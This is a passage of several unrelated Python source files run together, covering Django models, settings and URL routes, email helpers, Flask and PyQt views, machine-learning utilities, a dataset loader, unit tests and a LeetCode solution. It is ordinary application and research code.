Organisation class NewsTag(models.Model): urlname = models.CharField(max_length=20, null=False, blank=False, unique=True) name = models.CharField(max_length=32, null=False, blank=False) description = models.CharField(max_length=200, null=False, blank=False) def __str__(self): return self.name class Meta: ordering = ('urlname', ) class NewsArticle(models.Model): org = models.ForeignKey(Organisation, null=False, blank=False, verbose_name="Organisation", help_text="If no organisations are listed, please check the <a href=\"/account/orglist/\">organisation list</a> and contact the 
organisation manager or <a href=\"mailto:<EMAIL>\"><EMAIL></a> if none are listed.", on_delete=models.CASCADE) approved = models.BooleanField(null=False, blank=False, default=False) date = models.DateField(null=False, blank=False, default=date.today) title = models.CharField(max_length=200, null=False, blank=False) content = models.TextField(null=False, blank=False) tweeted = models.BooleanField(null=False, blank=False, default=False) tags = models.ManyToManyField(NewsTag, blank=False, help_text="Hover mouse over tags to view full description") send_notification = True send_m2m_notification = True markdown_fields = ('content',) def purge_urls(self): yield '/about/news/%s/' % self.pk yield '/about/newsarchive/' yield '/news.rss' yield '/news/.*.rss' # FIXME: when to expire the front page? yield '/$' def __str__(self): return "%s: %s" % (self.date, self.title) def verify_submitter(self, user): return (len(self.org.managers.filter(pk=user.pk)) == 1) def is_migrated(self): if self.org.pk == 0: return True return False @property def displaydate(self): return self.date.strftime("%Y-%m-%d") class Meta: ordering = ('-date',) import os HBP_IDENTITY_SERVICE_URL_V2 = "https://iam.ebrains.eu/auth/realms/hbp/protocol/openid-connect" HBP_COLLAB_SERVICE_URL_V2 = "https://wiki.ebrains.eu/rest/v1/" EBRAINS_IAM_CONF_URL = "https://iam.ebrains.eu/auth/realms/hbp/.well-known/openid-configuration" EBRAINS_IAM_CLIENT_ID = os.environ.get("EBRAINS_IAM_CLIENT_ID") EBRAINS_IAM_SECRET = os.environ.get("EBRAINS_IAM_SECRET") KG_SERVICE_ACCOUNT_CLIENT_ID = os.environ.get("KG_SERVICE_ACCOUNT_CLIENT_ID") KG_SERVICE_ACCOUNT_SECRET = os.environ.get("KG_SERVICE_ACCOUNT_SECRET") SESSIONS_SECRET_KEY = os.environ.get("SESSIONS_SECRET_KEY") BASE_URL = os.environ.get("PROV_API_BASE_URL") KG_CORE_API_HOST = os.environ.get("KG_CORE_API_HOST") ADMIN_GROUP_ID = "computation-curators" from typing import Iterable, List, Tuple from django.core.mail import get_connection, EmailMultiAlternatives from django.template.loader import render_to_string from django.utils.html import strip_tags from .models import Doubles, Season, Singles, ScoreKeepers def send_mass_html_mail(data_tuples: List[Tuple[str, str, str, str, List[str]]], fail_silently=False, user=None, password=<PASSWORD>, connection=None): """ Given a datatuple of (subject, text_content, html_content, from_email, recipient_list), sends each message to each recipient list. Returns the number of emails sent. If from_email is None, the DEFAULT_FROM_EMAIL setting is used. If auth_user and auth_password are set, they're used to log in. If auth_user is None, the EMAIL_HOST_USER setting is used. If auth_password is None, the EMAIL_HOST_PASSWORD setting is used. 
""" connection = connection or get_connection( username=user, password=password, fail_silently=fail_silently) messages = [] for subject, text, html, from_email, recipient in data_tuples: if len(recipient) > 0: message = EmailMultiAlternatives(subject, text, from_email, recipient) message.attach_alternative(html, 'text/html') messages.append(message) return connection.send_messages(messages) def send_roster_emails(year: int, seasons: Iterable[Season]): data_tuples = [personalize_roster(year, s) for s in seasons] send_mass_html_mail(data_tuples) def personalize_roster(year: int, season: Season) -> Tuple[str, str, str, str, List[str]]: context = {'season': season, 'year': year} html_content = render_to_string('roster_email.html', context) text_content = strip_tags(html_content) return "2021 WWTL Season", text_content, html_content, "<EMAIL>", [ season.player.user.email] def send_match_cards(all_singles: List[Singles], score_keeper: ScoreKeepers): data_tuples = [generate_singles_email(singles, score_keeper) for singles in all_singles if singles.player.player.user.email] send_mass_html_mail(data_tuples) def send_doubles_match_cards(all_doubles: List[Doubles], score_keeper: ScoreKeepers): data_tuples = [generate_doubles_email(doubles, score_keeper) for doubles in all_doubles] send_mass_html_mail(data_tuples) def generate_singles_email(singles: Singles, score_keeper: ScoreKeepers) -> Tuple[str, str, str, str, List[str]]: home_matches = singles.home_matches.all() away_matches = singles.away_matches.all() opponents = [m.away for m in home_matches] + [m.home for m in away_matches] context = {"opponents": opponents, "singles": singles, "score_keeper": score_keeper} html_content = render_to_string('singles_match_card.html', context) text_content = strip_tags(html_content) return "2021 WWTL Match Card", text_content, html_content, \ "<EMAIL>", [singles.player.player.user.email] def generate_doubles_email(doubles: Doubles, score_keeper: ScoreKeepers) -> Tuple[str, str, str, str, List[str]]: home_matches = doubles.home_matches.all() away_matches = doubles.away_matches.all() opponents = [m.away for m in home_matches] + [m.home for m in away_matches] context = {"opponents": opponents, "doubles": doubles, "score_keeper": score_keeper} html_content = render_to_string('doubles_match_card.html', context) text_content = strip_tags(html_content) emails = [player.player.user.email for player in [doubles.playerA, doubles.playerB] if player.player.user.email] return "2021 WWTL Match Card", text_content, html_content, "<EMAIL>", emails from . 
import mobile_blueprint from flask import render_template, request, flash, redirect, url_for from app import db from models.auth_model import User from models.test_set import TestSet from models.test_result import TestResult from util.web.web_auth import requires_session, csrf_protect from util.router import Router from util.json_helpers import JSON_SUCCESS, JSON_FAILURE from util.rest.rest_auth import requires_user_token import base64 import logging import math from util.jinja.units import KILOBYTES, MEGABYTES, GIGABYTES, BITS @mobile_blueprint.route('test_result/<result_id>/state', methods=['GET']) @requires_user_token() def test_finished(result_id): test_result = TestResult.get_result_by_id(result_id) if not test_result: return JSON_FAILURE(reason="Invalid test result id") return JSON_SUCCESS(state=test_result.state) @mobile_blueprint.route('test_set/<set_id>', methods=['GET']) @requires_user_token() def set_summary(set_id): test_set = TestSet.get_set_by_id(set_id) for aset in test_set.tests: logging.info("Set: %s, %s,", aset.device_name, aset.download_latencies) router = [aset for aset in test_set.tests if aset.device_type == 'router'][0] mobile = [aset for aset in test_set.tests if aset.device_type == 'mobile'][0] tputs = [0] if router.download_throughputs: tputs += router.download_throughputs if router.upload_throughputs: tputs += router.upload_throughputs if mobile.download_throughputs: tputs += mobile.download_throughputs if mobile.upload_throughputs: tputs += mobile.upload_throughputs tput_max = max(tputs) if tput_max > 2**30: tput_units = lambda x: GIGABYTES(BITS(x), 2) tput_units_name = "Gigabits" elif tput_max > 2**20: tput_units = lambda x: MEGABYTES(BITS(x), 2) tput_units_name = "Megabits" else: tput_units = lambda x: KILOBYTES(BITS(x), 2) tput_units_name = "Kilobits" intf_stats = {} # interface_name :: String -> list of downloads ts_d = 0 bytes_d = 0 has_router = False if router.interface_stats: has_router = True for i in router.interface_stats: intf_name = i["intf"] if intf_name not in intf_stats: intf_stats[intf_name] = [] intf_stats[intf_name].append([i["rx_bytes"], i["timestamp"] / 1000.0]) def derivative(lst): # takes [(bytes, timestamp)] -> ([bytes], [timestamp]) ret_bytes = [] ret_ts = [] ts_most = lst[-1][1] for i in range(len(lst)-1): ret_bytes.append((lst[i+1][0] - lst[i][0]) / 1000000.0) ret_ts.append(ts_most - lst[i][1]) return (ret_bytes, ret_ts) (bytes_d, ts_d) = derivative(intf_stats["eth1"]) if tput_max == 0: has_router = False return render_template('set_summary.html', user_token=request.args['user_token'], router=router, mobile=mobile, tput_units=tput_units, tput_units_name=tput_units_name, eth1_ts=ts_d, eth1_bytes=bytes_d, has_router=has_router, ) <reponame>tkragholm/RNAEditor<filename>ui/ResultTab.py<gh_stars>0 from PyQt4 import QtGui from PyQt4.QtCore import QUrl from PyQt4.QtWebKit import QWebView class ResultTab(QWebView): def __init__(self, control, site): super(ResultTab, self).__init__() self.control = control self.site = site self.createMenu() self.createComponents() self.createLayout() self.createConnects() def createMenu(self): pass def createComponents(self): self.load(QUrl(self.site)) def _result_available(self, ok): pass def createLayout(self): pass def createConnects(self): pass if __name__ == '__main__': import sys, os print(os.getcwd()) app = QtGui.QApplication(sys.argv) mainWindow = ResultTab(None, 'http://google.com') mainWindow.show() sys.exit(app.exec_()) <reponame>Aggrathon/CarAiSimulator import tensorflow as tf from model import 
Session, get_network from communication import Driver from data import VARIABLE_COUNT, IMAGE_DEPTH, IMAGE_HEIGHT, IMAGE_WIDTH def drive(): """ Drive a car, alternating between the networks """ tf.logging.set_verbosity(tf.logging.INFO) imgs = tf.placeholder(tf.float32, [None, IMAGE_WIDTH*IMAGE_HEIGHT*IMAGE_DEPTH]) vars = tf.placeholder(tf.float32, [None, VARIABLE_COUNT]) _, neta, netb = get_network(tf.reshape(imgs, [-1, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_DEPTH]), vars, training=False) with Session(False, False) as sess: with Driver() as driver: def inout(h, v): print("Driving | h: %+.2f v: %+.2f"%(h,v), end='\r') x, v, y, s = driver.drive(h, v) return { imgs: [x], vars: [v] } try: h = 0 v = 1 while True: h, v, _ = sess.session.run(neta.output, feed_dict=inout(h, v))[0] h, v, _ = sess.session.run(netb.output, feed_dict=inout(h, v))[0] except (KeyboardInterrupt, StopIteration): pass if __name__ == "__main__": drive()<filename>tests/cvp/padding.py """Test CVP of 2d zero padding operation.""" from torch.nn import ZeroPad2d from bpexts.cvp.padding import CVPZeroPad2d from .cvp_test import set_up_cvp_tests # hyper-parameters input_size = (2, 3, 4, 5) padding = (2, 1, 3, 4) atol = 1e-7 rtol = 1e-5 num_hvp = 10 def torch_fn(): return ZeroPad2d(padding) def cvp_fn(): return CVPZeroPad2d(padding) for name, test_cls in set_up_cvp_tests( torch_fn, cvp_fn, "CVPZeroPad2d", input_size=input_size, atol=atol, rtol=rtol, num_hvp=num_hvp, ): exec("{} = test_cls".format(name)) del test_cls def cvp_from_torch_fn(): """Create CVPZeroPad2d from ZeroPad2d.""" torch_layer = torch_fn() return CVPZeroPad2d.from_torch(torch_layer) for name, test_cls in set_up_cvp_tests( torch_fn, cvp_from_torch_fn, "CVPZeroPad2dFromTorch", input_size=input_size, atol=atol, rtol=rtol, num_hvp=num_hvp, ): exec("{} = test_cls".format(name)) del test_cls <reponame>AutuanLiu/LeetCode2019 # # @lc app=leetcode id=75 lang=python3 # # [75] Sort Colors # # https://leetcode.com/problems/sort-colors/description/ # # algorithms # Medium (41.62%) # Total Accepted: 306.7K # Total Submissions: 733.7K # Testcase Example: '[2,0,2,1,1,0]' # # Given an array with n objects colored red, white or blue, sort them in-place # so that objects of the same color are adjacent, with the colors in the order # red, white and blue. # # Here, we will use the integers 0, 1, and 2 to represent the color red, white, # and blue respectively. # # Note: You are not suppose to use the library's sort function for this # problem. # # Example: # # # Input: [2,0,2,1,1,0] # Output: [0,0,1,1,2,2] # # Follow up: # # # A rather straight forward solution is a two-pass algorithm using counting # sort. # First, iterate the array counting number of 0's, 1's, and 2's, then overwrite # array with total number of 0's, then 1's and followed by 2's. # Could you come up with a one-pass algorithm using only constant space? # # # class Solution: def sortColors(self, nums: List[int]) -> None: """ Do not return anything, modify nums in-place instead. 
""" self.sort(nums, 0, len(nums) - 1) # 排序 def partition(self, nums, start, end): """找到分割点的同时进行排序""" i = start - 1 pivot = nums[end] # 使用最后的一个元素作为分割元素 for j in range(start, end): if nums[j] < pivot: i = i + 1 # 如果找到比基准元素小的就交换 nums[i], nums[j] = nums[j], nums[i] # 遍历一遍即以找到基准位置 i+1, 之后填入基准元素 nums[i + 1], nums[end] = nums[end], nums[i + 1] return i + 1 def sort(self, nums, start, end): if start < end: p = self.partition(nums, start, end) # 找到分割位置 self.sort(nums, start, p - 1) # 左半边排序 self.sort(nums, p + 1, end) # 右半边排序 """ Django settings for django_cookbook project. Generated by 'django-admin startproject' using Django 3.1.1. For more information on this file, see https://docs.djangoproject.com/en/3.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.1/ref/settings/ """ import os import json from pathlib import Path from django.core.exceptions import ImproperlyConfigured from ..apps.core.versioning import get_git_change_set_timestamp from django.utils.translation import gettext_lazy as _ PROJECT_NAME = 'django_cookbook' with open(os.path.join(os.path.dirname(__file__), 'secrets.json'), 'r') as f: secrets = json.loads(f.read()) def get_secret(setting): """Get the secret variable or return explicit exception""" try: return secrets[setting] except KeyError: error_msg = f'Set the {setting} environment variable' raise ImproperlyConfigured(error_msg) # Build paths inside the project like this: BASE_DIR / 'subdir'. # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent.parent PROJECT_DIR = Path(__file__).resolve().parent.parent # PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # BASE_DIR = os.path.dirname(PROJECT_DIR) # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # internal apps 'django_cookbook.apps.magazine', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = PROJECT_NAME + '.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [ os.path.join(PROJECT_DIR, 'templates') ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = PROJECT_NAME+'.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', }, # 'mysql': { # 'ENGINE': 'django.db.backends.mysql', # 'NAME': get_secret('DATABASE_NAME'), # 'USER': get_secret('DATABASE_USER'), # 'PASSWORD': get_secret('DATABASE_PASSWORD'), # 'HOST': get_secret('DATABASE_HOST'), # 'PORT': get_secret('DATABASE_PORT'), # 'OPTIONS': { # 'init_command': "SET sql_mode='STRICT_TRANS_TABLES'" # } # }, # 'postgresql': { # 'ENGINE': 'django.db.backends.postgresql_psycopg2', # 'NAME': get_secret('DATABASE_NAME'), # 'USER': 
get_secret('DATABASE_USER'), # 'PASSWORD': get_secret('DATABASE_PASSWORD'), # 'HOST': get_secret('DATABASE_HOST'), # 'PORT': get_secret('DATABASE_PORT'), # }, } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Ashgabat' USE_I18N = True USE_L10N = True USE_TZ = True LOCALE_PATHS = [ 'locale/', os.path.join(BASE_DIR, 'locale'), os.path.join(BASE_DIR, PROJECT_NAME, 'locale'), ] # gettext = lambda s: s LANGUAGES = [ ('en', _('English')), ('tk', _('Turkmen')), ('ru', _('Russian')), ] # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATICFILES_FINDERS = [ 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ] STATICFILES_DIRS = [ os.path.join(BASE_DIR, PROJECT_NAME, 'static') ] # ManifestStaticFilesStorage is recommended in production, to prevent outdated # Javascript / CSS assets being served from cache (e.g. after a Wagtail upgrade). # See https://docs.djangoproject.com/en/3.1/ref/contrib/staticfiles/#manifeststaticfilesstorage STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage' STATIC_ROOT = os.path.join(BASE_DIR, 'static') with open(os.path.join(BASE_DIR, PROJECT_NAME, 'settings', 'last_update.txt'), 'r') as f: timestamp = f.readline().strip() STATIC_URL = f'/static/{timestamp}/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') # # AUTHENTICATION settings # LOGIN_URL = '/login/' # # LOGIN_REDIRECT_URL = '/' # # LOGOUT_REDIRECT_URL = 'account_login' # # EMAIL_USE_TLS = True # # EMAIL_HOST = get_secret('EMAIL_HOST') # EMAIL_PORT = get_secret('EMAIL_PORT') # EMAIL_HOST_USER = get_secret('EMAIL_HOST_USER') # EMAIL_HOST_PASSWORD = get_secret('EMAIL_HOST_PASSWORD') # SERVER_EMAIL = get_secret('EMAIL_HOST_USER') # DEFAULT_FROM_EMAIL = get_secret('EMAIL_HOST_USER') # # # Base URL to use when referring to full URLs within the Wagtail admin backend - # # e.g. in notification emails. Don't include '/admin' or a trailing slash # BASE_URL = 'https://pythonanywhere852.pythonanywhere.com/' # # # Session settings # SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db' # # # SESSION_EXPIRE_AT_BROWSER_CLOSE = True # # # SESSION_COOKIE_AGE = 5 * 60 # # SESSION_COOKIE_SAMESITE = 'Strict' # # SESSION_SAVE_EVERY_REQUEST = True import math import torch import matplotlib matplotlib.use('Agg') # or 'PS', 'PDF', 'SVG' import matplotlib.pyplot as plt import numpy as np from torchvision.utils import make_grid from datetime import datetime from PIL import Image import logging from time import time def plot_images_grid(x: torch.tensor, export_img, title: str = '', nrow=8, padding=2, normalize=False, pad_value=0): """ Plot 4D Tensor of images of shape (B x C x H x W) as a grid. 
""" grid = make_grid(x, nrow=nrow, padding=padding, normalize=normalize, pad_value=pad_value) npgrid = grid.cpu().numpy() plt.figure(figsize=(50,50)) plt.imshow(np.transpose(npgrid, (1, 2, 0)), interpolation='nearest') ax = plt.gca() ax.xaxis.set_visible(False) ax.yaxis.set_visible(False) if not (title == ''): plt.title(title) img = Image.new(mode='L', size=(4096,4096)) filename = export_img + '_' + str(datetime.now()) + '.png' img.save(filename, "PNG") plt.savefig(filename, bbox_inches='tight', pad_inches=0.1) plt.clf() def round_scores(x, num=5): return round(x, num) def digitize_scores(norms: list, anoms: list, num_bins = 21): logger = logging.getLogger() norm_start = time() data = np.append(anoms, norms) anoms_log = list(map(lambda x: math.log(x), anoms)) norms_log = list(map(lambda x: math.log(x), norms)) data = np.append(anoms_log, norms_log) anoms_normalized = list(map(lambda x: (x-min(data))/(max(data)-min(data)), anoms_log)) norms_normalized = list(map(lambda x: (x-min(data))/(max(data)-min(data)), norms_log)) norm_end = time() logger.info("Done normalizing anomaly scores (%s seconds)" % (norm_end-norm_start)) min_score = min(np.append(anoms_normalized, norms_normalized)) max_score = max(np.append(anoms_normalized, norms_normalized)) bins = np.linspace(min_score, max_score, num_bins+1) # list of bin edges bins = bins[1:num_bins] bin_norms = np.digitize(norms_normalized, bins, right=True) # list of bin number per score count_norms = np.zeros(num_bins) # counts of bin for i in bin_norms: count_norms[i] += 1 bin_anoms = np.digitize(anoms_normalized, bins) count_anoms = np.zeros(num_bins) for i in bin_anoms: count_anoms[i] += 1 bar_pos = np.arange(1, num_bins+1) step_size = 5 x_pos = np.arange(0, num_bins, step_size) pad = (bins[1]-bins[0])/2 lss2 = pad*2*step_size lss = bins[5]-bins[0] # label step size x_label = list(map(round_scores, np.arange(min_score+pad, max_score, lss))) return count_norms, count_anoms, bins, bar_pos, x_pos, x_label def normalize_bins(norm_bins, anom_bins): norm_total, anom_total = 0, 0 for i in norm_bins: norm_total += i for i in anom_bins: anom_total += i normalized_norm_bins = list(map(lambda x: round_scores(x/norm_total*100,2), norm_bins)) normalized_anom_bins = list(map(lambda x: round_scores(x/anom_total*100,2), anom_bins)) return normalized_norm_bins, normalized_anom_bins def plot_images_hist(normal_scores, anomaly_scores, export_img, title: str = '', auc = None): """ Plot 2d histogram """ logger = logging.getLogger() logger.info('Plotting histogram...') bar_width = 0.4 num_bins = 21 normal_scores_bin, anomaly_scores_bin, bins, bar_pos, x_pos, x_label = digitize_scores(normal_scores.tolist(), anomaly_scores.tolist(), num_bins) normalized_norm_sc_bin, normalized_anom_sc_bin = normalize_bins(normal_scores_bin, anomaly_scores_bin) fig, ax = plt.subplots() ax.bar(x=bar_pos-bar_width/2, height=normalized_norm_sc_bin, width=bar_width, label='Normal') ax.bar(x=bar_pos+bar_width/2, height=normalized_anom_sc_bin, width=bar_width, label='Crack') plt.ylabel('Frequency (%)') #ax.set_xticks(x_pos) #ax.set_xticklabels(x_label, rotation=30) ax.set_xticks([0,22]) ax.set_xticklabels([0,1]) plt.grid(axis='y', alpha=0.75) plt.xlabel('Anomaly score') plt.legend() if not (title == ''): if auc != None: plt.title(title + ' (AUC = ' + str(round(auc, 4)*100) + '%)') else: plt.title(title) img = Image.new(mode='L', size=(4,4)) filename = export_img + '_' + str(datetime.now()) + '.png' img.save(filename, "PNG") plt.savefig(filename, bbox_inches='tight', pad_inches=0.1) plt.clf() 
logger.info('Plotted histogram.') import os import time import os.path as osp import xml.etree.ElementTree as ET import numpy as np from PIL import Image from functools import partial from multiprocessing import Pool from .misc import img_exts def load_hrsc(img_dir, ann_dir, classes=None, img_keys=dict(), obj_keys=dict(), nproc=10): if classes is not None: print('load_hrsc loads all objects as ship, arguments classes is no use') assert osp.isdir(img_dir), f'The {img_dir} is not an existing dir!' assert ann_dir is None or osp.isdir(ann_dir), f'The {ann_dir} is not an existing dir!' contents = [] print('Starting loading HRSC dataset information.') start_time = time.time() _load_func = partial(_load_hrsc_single, img_dir=img_dir, ann_dir=ann_dir, img_keys=img_keys, obj_keys=obj_keys) if nproc > 1: pool = Pool(nproc) contents = pool.map(_load_func, os.listdir(img_dir)) pool.close() else: contents = list(map(_load_func, os.listdir(img_dir))) contents = [c for c in contents if c is not None] end_time = time.time() print(f'Finishing loading HRSC, get {len(contents)} images,', f'using {end_time-start_time:.3f}s.') return contents, ['ship'] def _load_hrsc_single(imgfile, img_dir, ann_dir, img_keys, obj_keys): img_id, ext = osp.splitext(imgfile) if ext not in img_exts: return None xmlfile = None if ann_dir is None else osp.join(ann_dir, img_id+'.xml') content = _load_hrsc_xml(xmlfile, img_keys, obj_keys) if not ('width' in content and 'height' in content): imgpath = osp.join(img_dir, imgfile) size = Image.open(imgpath).size content.update(dict(width=size[0], height=size[1])) content.update(dict(filename=imgfile, id=img_id)) return content def _load_hrsc_xml(xmlfile, img_keys=dict(), obj_keys=dict()): hbboxes, bboxes, diffs = list(), list(), list() content = {k: None for k in img_keys} ann = {k: [] for k in obj_keys} if xmlfile is None: pass elif not osp.isfile(xmlfile): print(f"Can't find {xmlfile}, treated as empty xmlfile") else: tree = ET.parse(xmlfile) root = tree.getroot() content['width'] = int(root.find('Img_SizeWidth').text) content['height'] = int(root.find('Img_SizeHeight').text) for k, xml_k in img_keys.items(): node = root.find(xml_k) value = None if node is None else node.text content[k] = value objects = root.find('HRSC_Objects') for obj in objects.findall('HRSC_Object'): hbboxes.append([ float(obj.find('box_xmin').text), float(obj.find('box_ymin').text), float(obj.find('box_xmax').text), float(obj.find('box_ymax').text) ]) bboxes.append([ float(obj.find('mbox_cx').text), float(obj.find('mbox_cy').text), float(obj.find('mbox_w').text), float(obj.find('mbox_h').text), -float(obj.find('mbox_ang').text) ]) diffs.append( int(obj.find('difficult').text)) for k, xml_k in obj_keys.items(): node = obj.find(xml_k) value = None if node is None else node.text ann[k].append(value) hbboxes = np.array(hbboxes, dtype=np.float32) if hbboxes \ else np.zeros((0, 4), dtype=np.float32) bboxes = np.array(bboxes, dtype=np.float32) if bboxes \ else np.zeros((0, 5), dtype=np.float32) diffs = np.array(diffs, dtype=np.int64) if diffs \ else np.zeros((0, ), dtype=np.int64) labels = np.zeros((bboxes.shape[0], ), dtype=np.int64) ann['hbboxes'] = hbboxes ann['bboxes'] = bboxes ann['diffs'] = diffs ann['labels'] = labels content['ann'] = ann return content # -*- encoding: utf-8 -*- from django.conf.urls.defaults import * from . 
import views, models urlpatterns = patterns('', # Journal Tools url(r'^$', views.journal_index, {'model': models.Journal}, name="journal.index"), url(r'^new/$', views.add_journal, name='journal.add'), url(r'^(?P<journal_id>\d+)/dash/$', views.dash_journal, name='journal.dash'), url(r'^(?P<journal_id>\d+)/edit/$', views.add_journal, name='journal.edit'), url(r'^(?P<object_id>\d+)/toggle_availability/$', views.generic_toggle_availability, {'model': models.Journal}, name='journal.toggle_availability'), url(r'^(?P<journal_id>\d+)/edit/status/$', views.edit_journal_status, name='journal_status.edit'), url(r'^del_pended/(?P<form_hash>\w+)/$', views.del_pended, name='journal.del_pended'), #Editor Pages url(r'^(?P<journal_id>\d+)/edash/$', views.dash_editor_journal, name='editor_journal.dash'), url(r'ej/$', views.editor_journal, name='editor_journal.index'), # Sponsor Tools url(r'^sponsor/$', views.sponsor_index, {'model': models.Sponsor}, name='sponsor.index'), url(r'^sponsor/new/$', views.add_sponsor, name='sponsor.add'), url(r'^sponsor/(?P<sponsor_id>\d+)/edit/$', views.add_sponsor, name='sponsor.edit'), url(r'^sponsor/(?P<object_id>\d+)/toggle_availability/$', views.generic_toggle_availability, {'model': models.Sponsor}, name='sponsor.toggle_availability'), # Editors url(r'^(?P<journal_id>\d+)/editors/$', views.journal_editors, name='journal_editors.index'), url(r'^(?P<journal_id>\d+)/editors/add$', views.journal_editors_add, name='journal_editors.add'), url(r'^(?P<journal_id>\d+)/editors/(?P<user_id>\d+)/remove/$', views.journal_editors_remove, name='journal_editors.remove'), # Section Tools url(r'^(?P<journal_id>\d+)/section/$', views.section_index, {'model': models.Section}, name='section.index'), url(r'^(?P<journal_id>\d+)/section/new/$', views.add_section, name='section.add'), url(r'^(?P<journal_id>\d+)/section/(?P<section_id>\d+)/edit/$', views.add_section, name='section.edit'), url(r'^(?P<journal_id>\d+)/section/(?P<section_id>\d+)/del/$', views.del_section, name='section.del'), # Press release Tools url(r'^(?P<journal_id>\d+)/prelease/$', views.pressrelease_index, name='prelease.index'), url(r'^(?P<journal_id>\d+)/prelease/new/$', views.add_pressrelease, name='prelease.add'), url(r'^(?P<journal_id>\d+)/prelease/(?P<prelease_id>\d+)/edit/$', views.add_pressrelease, name='prelease.edit'), url(r'^(?P<journal_id>\d+)/aprelease/new/$', views.add_aheadpressrelease, name='aprelease.add'), url(r'^(?P<journal_id>\d+)/aprelease/(?P<prelease_id>\d+)/edit/$', views.add_aheadpressrelease, name='aprelease.edit'), # Issue Tools url(r'^(?P<journal_id>\d+)/issue/$', views.issue_index, name='issue.index'), url(r'^(?P<journal_id>\d+)/issue/new/regular/$', views.add_issue, {'issue_type': 'regular'}, name='issue.add_regular'), url(r'^(?P<journal_id>\d+)/issue/new/special/$', views.add_issue, {'issue_type': 'special'}, name='issue.add_special'), url(r'^(?P<journal_id>\d+)/issue/new/supplement/$', views.add_issue, {'issue_type': 'supplement'}, name='issue.add_supplement'), url(r'^(?P<journal_id>\d+)/issue/reorder/$', views.issue_reorder, name='issue.reorder.ajax'), url(r'^(?P<journal_id>\d+)/issue/(?P<issue_id>\d+)/edit/$', views.edit_issue, name='issue.edit'), url(r'^issue/(?P<object_id>\d+)/toggle_availability/$', views.generic_toggle_availability, {'model': models.Issue}, name='issue.toggle_availability'), # Users Tools url(r'^user/$', views.user_index, name="user.index"), url(r'^user/new/$', views.add_user, name="user.add"), url(r'^user/(?P<user_id>\d+)/edit/$', views.add_user, name="user.edit"), 
url(r'^user/(?P<user_id>\d+)/toggle_availability/$', views.toggle_user_availability, name='user.toggle_availability'), url(r'^user/(?P<user_id>\d+)/toggle_active_collection/(?P<collection_id>\d+)$', views.toggle_active_collection, name='usercollection.toggle_active'), # Ajax requests url(r'^ajx/ajx1/$', views.ajx_list_issues_for_markup_files, name="ajx.list_issues_for_markup_files"), url(r'^ajx/ajx2/$', views.ajx_lookup_for_section_translation, name="ajx.lookup_for_section_translation"), ) import unittest import os import sys import subprocess sys.path.insert(0, "..") from progressio.progressio import ( add, get_item) class TestDelete(unittest.TestCase): def setUp(self): """ Clean up old progress files. """ filelist = [f for f in os.listdir(".") if f.startswith("progress.")] for f in filelist: os.remove(f) def test_item_can_be_deleted(self): """ Item can be deleted and message is shown. """ # create progress.db p = subprocess.Popen('../progressio/progressio.py', stdin=subprocess.PIPE) p.communicate('y\n') # add item, it is added with pk=1 add('item to be deleted') p = subprocess.Popen( '../progressio/progressio.py delete 1', stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) output = p.communicate('y\n')[0] self.assertTrue("Deleted item 1" in output) # item is not in database self.assertTrue(get_item(1) is None) def test_if_not_confirmed_not_deleted(self): """ If delete operation is not confirmed item is not deleted. """ # create progress.db p = subprocess.Popen('../progressio/progressio.py', stdin=subprocess.PIPE) p.communicate('y\n') # add item, it is added with pk=1 add('item to be deleted') p = subprocess.Popen( '../progressio/progressio.py delete 1', stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) output = p.communicate('n\n')[0] self.assertFalse("Deleted item 1" in output) # item is in database self.assertFalse(get_item(1) is None) if __name__ == '__main__': unittest.main() <filename>ohsiha/core/forms.py from django import forms from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User class RegisterForm(UserCreationForm): email = forms.EmailField(max_length=254) class Meta: model = User fields = ('username', 'email', '<PASSWORD>', '<PASSWORD>', )from MDSplus import * modelTree=Tree("spectroscopy",-1) s_old=1180626500 s=1180705500 for i in range (1,41): modelTree.createPulse(s+i) myTree=Tree("spectroscopy",s+i) myTree.getNode("gpi_tcv.APD_ARRAY.CONTROL.FILTER.VALUE").putData('DA6563') for j in range (1,5): for k in range (1,33): if k<10: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_0'+str(k)).getData().data().tolist() 